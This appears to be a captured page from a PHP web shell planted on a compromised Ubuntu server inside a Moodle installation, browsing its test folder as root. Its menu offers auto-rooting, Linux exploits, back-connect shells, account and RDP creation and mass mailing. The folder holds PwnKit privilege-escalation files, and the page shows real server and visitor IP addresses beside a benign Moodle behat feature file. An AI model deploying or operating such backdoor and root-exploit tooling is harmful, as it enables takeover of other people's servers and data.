Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
page /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
page_appearance.feature
1.32
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page_appearance.feature
@mod @mod_page Feature: Configure page appearance In order to change the appearance of the page resource As an admin I need to configure the page appearance settings Background: Given the following "courses" exist: | shortname | fullname | | C1 | Course 1 | And the following "activities" exist: | activity | name | intro | course | idnumber | | page | PageName1 | PageDesc1 | C1 | PAGE1 | @javascript Scenario Outline: Hide and display page features Given I am on the "PageName1" "page activity editing" page logged in as admin And I expand all fieldsets And I set the field "Display page name" to "<value>" And I press "Save and display" Then I <shouldornot> see "PageName1" in the "region-main" "region" Examples: | feature | lookfor | value | shouldornot | | Display page name | PageName1 | 1 | should | | Display page name | PageName1 | 0 | should not | | Display page description | PageDesc1 | 1 | should | | Display page description | PageDesc1 | 0 | should not | | Display last modified date | Last modified: | 1 | should | | Display last modified date | Last modified: | 0 | should not |
Close